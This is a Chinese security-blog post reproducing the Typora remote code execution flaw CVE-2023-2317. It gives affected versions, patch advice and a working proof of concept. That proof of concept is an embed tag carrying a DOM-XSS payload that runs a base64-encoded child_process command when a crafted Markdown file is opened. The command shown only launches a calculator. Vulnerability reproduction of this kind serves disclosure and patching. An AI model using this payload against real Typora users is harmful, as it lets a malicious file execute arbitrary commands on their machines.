CTF导航 CTF导航

Typora 远程代码执行漏洞(CVE-2023-2317)

渗透技巧 8个月前 admin
500 0 0



网安引领时代,弥天点亮未来   





 

Typora 远程代码执行漏洞(CVE-2023-2317)

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Typora 远程代码执行漏洞(CVE-2023-2317)

0x01漏洞介绍


Typora是一款编辑器。

Typora 1.6.7之前版本存在安全漏洞,该漏洞源于通过在标签中加载 typora://app/typemark/updater/update.html ,可以在Typora主窗口中加载JavaScript代码。

Typora 远程代码执行漏洞(CVE-2023-2317)

0x02影响版本


Typora < 1.6.7

Typora 远程代码执行漏洞(CVE-2023-2317)



Typora 远程代码执行漏洞(CVE-2023-2317)

0x03漏洞复现

1.下载部署有漏洞版本环境,这里部署版本为

Typora for Windows 1.5.12

Typora 远程代码执行漏洞(CVE-2023-2317)

2.对漏洞进行复现

 POC 

<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">

base64解码

Typora 远程代码执行漏洞(CVE-2023-2317)

当在Typora中加载此PoC时,使用DOM-XSS Payload加载updater.html,有效负载在主窗口上执行JavaScript代码,执行系统命令。具体操作如下:

1.新建md文件,写入poc代码,注意类型为html

Typora 远程代码执行漏洞(CVE-2023-2317)

2.然后打开文件,将进行命令执行。

Typora 远程代码执行漏洞(CVE-2023-2317)

测试视频


Typora 远程代码执行漏洞(CVE-2023-2317)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://support.typora.io/What's-New-1.6/https://buaq.net/go-175535.html?utm_source=feedly



弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来















Typora 远程代码执行漏洞(CVE-2023-2317) 


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

Typora 远程代码执行漏洞(CVE-2023-2317)


原文始发于微信公众号(弥天安全实验室):Typora 远程代码执行漏洞(CVE-2023-2317)

版权声明:admin 发表于 2023年8月28日 下午7:18。
转载请注明:Typora 远程代码执行漏洞(CVE-2023-2317) | CTF导航

相关文章

Discord钓鱼攻击案例分析
admin
436
每日安全动态推送(02-09)
admin
826
一处JS反调试引发的思考
admin
618
Leaking ObjRefs to Exploit HTTP .NET Remoting
admin
49
每日安全动态推送(4-18)
admin
287
MuddyWater eN-Able spear-phishing with new TTPs
admin
67

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

Cookie-Monster – BOF To Steal Browser Cookies & Credentials
0
How Did I Easily Find Stored XSS at Apple And Earn $5000 ?
0
How I Discovered an RCE Vulnerability in Tesla, Securing a $10,000 Bounty
0
pgAdmin 8.3 Remote Code Execution
0
How I Prevented a Mass Data Breach – $15,000 bounty – @bxmbn
0
The Windows Registry Adventure #1: Introduction and research results
0
使用 VIM 进行代码审计
0
Progress Flowmon 任意命令执行漏洞 CVE-2024-2389
0
实践调试Ghidra代码和Ghidra脚本
0
Vulnerabilities across keyboard apps reveal keystrokes to network eavesdroppers
0